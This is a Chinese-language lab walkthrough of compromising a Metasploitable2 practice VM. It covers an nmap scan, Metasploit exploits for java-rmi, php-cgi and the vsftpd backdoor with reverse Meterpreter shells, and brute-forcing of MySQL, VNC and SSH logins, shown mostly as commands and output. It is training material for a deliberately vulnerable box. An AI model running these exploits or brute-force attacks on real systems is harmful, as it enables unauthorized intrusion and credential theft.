Metasploitable靶场

1 基本环境

虚拟机账号密码：msfadmin/msfadmin

kali主机IP：192.168.5.136

metasploitable2靶机IP：192.168.5.160

使用浏览器登录靶机：

 

 

 

2 信息收集

└─# nmap 192.168.5.16
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-03 01:30 EST
Nmap scan report for 192.168.5.160
Host is up (0.00098s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:84:03:C5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds

使用nessus扫描结果如下：

 

 

 

3 漏洞利用

3.1 1099 java-rmi

msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.5.160
rhosts => 192.168.5.160
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.5.136:4444
[*] 192.168.5.160:1099 - Using URL: http://192.168.5.136:8080/gNzInc
[*] 192.168.5.160:1099 - Server started.
[*] 192.168.5.160:1099 - Sending RMI Header...
[*] 192.168.5.160:1099 - Sending RMI Call...
[*] 192.168.5.160:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 192.168.5.160
[*] Meterpreter session 1 opened (192.168.5.136:4444 -> 192.168.5.160:54656) at 2023-02-03 01:59:08 -0500

meterpreter > sessions -i 1
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > shell
Process 1 created.
Channel 1 created.

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:84:03:c5
          inet addr:192.168.5.160  Bcast:192.168.5.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe84:3c5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9988 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8399 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1348357 (1.2 MB)  TX bytes:1736001 (1.6 MB)
          Interrupt:17 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:247 errors:0 dropped:0 overruns:0 frame:0
          TX packets:247 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:92245 (90.0 KB)  TX bytes:92245 (90.0 KB)

pwd
/
whoami
root

3.2 php cgi漏洞

msf6 > use exploit/multi/http/php_cgi_arg_injection
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 192.168.5.160
rhosts => 192.168.5.160
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit

[*] Started reverse TCP handler on 192.168.5.136:4444
[*] Sending stage (39927 bytes) to 192.168.5.160
[*] Meterpreter session 1 opened (192.168.5.136:4444 -> 192.168.5.160:50128) at 2023-02-03 03:09:35 -0500

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: www-data
meterpreter > shell
Process 14610 created.
Channel 0 created.
ifconfig
/bin/sh: line 1: ifconfig: command not found
whoami
www-data

3.3 3306数据库默认端口

既然运行远程连接，直接爆破，账号root密码为空然后登入

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Ac
                                                cepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit
                                                -framework/wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one
                                                pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.5.160
rhosts => 192.168.5.160
msf6 auxiliary(scanner/mysql/mysql_login) > set username root
username => root
msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.5.160:3306    - 192.168.5.160:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.5.160:3306    - 192.168.5.160:3306 - Success: 'root:'
[*] 192.168.5.160:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_login) >

┌──(root㉿kali)-[~]
└─# mysql -h 192.168.5.160 -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 32
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

3.4 VNC

msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > show options

Module options (auxiliary/scanner/vnc/vnc_login):

   Name              Current Setting              Required  Description
   ----              ---------------              --------  -----------
   BLANK_PASSWORDS   false                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                            yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                        no        Try each user/password couple stored in the curr
                                                            ent database
   DB_ALL_PASS       false                        no        Add all passwords in the current database to the
                                                             list
   DB_ALL_USERS      false                        no        Add all users in the current database to the lis
                                                            t
   DB_SKIP_EXISTING  none                         no        Skip existing credentials stored in the current
                                                            database (Accepted: none, user, user&realm)
   PASSWORD                                       no        The password to test
   PASS_FILE         /usr/share/metasploit-frame  no        File containing passwords, one per line
                     work/data/wordlists/vnc_pas
                     swords.txt
   Proxies                                        no        A proxy chain of format type:host:port[,type:hos
                                                            t:port][...]
   RHOSTS                                         yes       The target host(s), see https://github.com/rapid
                                                            7/metasploit-framework/wiki/Using-Metasploit
   RPORT             5900                         yes       The target port (TCP)
   STOP_ON_SUCCESS   false                        yes       Stop guessing when a credential works for a host
   THREADS           1                            yes       The number of concurrent threads (max one per ho
                                                            st)
   USERNAME          <BLANK>                      no        A specific username to authenticate as
   USERPASS_FILE                                  no        File containing users and passwords separated by
                                                             space, one pair per line
   USER_AS_PASS      false                        no        Try the username as the password for all users
   USER_FILE                                      no        File containing usernames, one per line
   VERBOSE           true                         yes       Whether to print output for all attempts

msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.5.160
rhosts => 192.168.5.160
msf6 auxiliary(scanner/vnc/vnc_login) > run

[*] 192.168.5.160:5900    - 192.168.5.160:5900 - Starting VNC login sweep
[!] 192.168.5.160:5900    - No active DB -- Credential data will not be saved!
[+] 192.168.5.160:5900    - 192.168.5.160:5900 - Login Successful: :password
[*] 192.168.5.160:5900    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/vnc/vnc_login) >

3.5 ftp后门

msf6 > use unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.5.160
rhosts => 192.168.5.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.5.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.5.160:21 - USER: 331 Please specify the password.

[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.5.160:21 - The port used by the backdoor bind listener is already open
[+] 192.168.5.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 3 opened (192.168.5.136:45575 -> 192.168.5.160:6200) at 2023-02-03 03:31:21 -0500

whoami
root
ifocnifg
sh: line 7: ifocnifg: command not found
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:84:03:c5
          inet addr:192.168.5.160  Bcast:192.168.5.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe84:3c5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:77211 errors:0 dropped:0 overruns:0 frame:0
          TX packets:65386 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:10964795 (10.4 MB)  TX bytes:11158743 (10.6 MB)
          Interrupt:17 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:629 errors:0 dropped:0 overruns:0 frame:0
          TX packets:629 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:279905 (273.3 KB)  TX bytes:279905 (273.3 KB)

3.6 ssh密码爆破

└─# hydra -L user.txt -P pass.txt -t 2 -vV -e ns 192.168.5.160 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-03 03:47:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 2 tasks per 1 server, overall 2 tasks, 15 login tries (l:3/p:5), ~8 tries per task
[DATA] attacking ssh://192.168.5.160:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://msfadmin@192.168.5.160:22
[INFO] Successful, password authentication is supported by ssh://192.168.5.160:22
[ATTEMPT] target 192.168.5.160 - login "msfadmin" - pass "msfadmin" - 1 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.5.160 - login "msfadmin" - pass "" - 2 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.5.160 - login "msfadmin" - pass "123456" - 3 of 15 [child 1] (0/0)
[22][ssh] host: 192.168.5.160   login: msfadmin   password: msfadmin
[ATTEMPT] target 192.168.5.160 - login "root" - pass "root" - 6 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.5.160 - login "root" - pass "" - 7 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.5.160 - login "root" - pass "123456" - 8 of 15 [child 1] (0/0)
[22][ssh] host: 192.168.5.160   login: root   password: 123456
[ATTEMPT] target 192.168.5.160 - login "admin" - pass "admin" - 11 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.5.160 - login "admin" - pass "" - 12 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.5.160 - login "admin" - pass "123456" - 13 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.5.160 - login "admin" - pass "asdfjkl" - 14 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.5.160 - login "admin" - pass "msfadmin" - 15 of 15 [child 0] (0/0)
[STATUS] attack finished for 192.168.5.160 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-03 03:47:30

┌──(root㉿kali)-[~]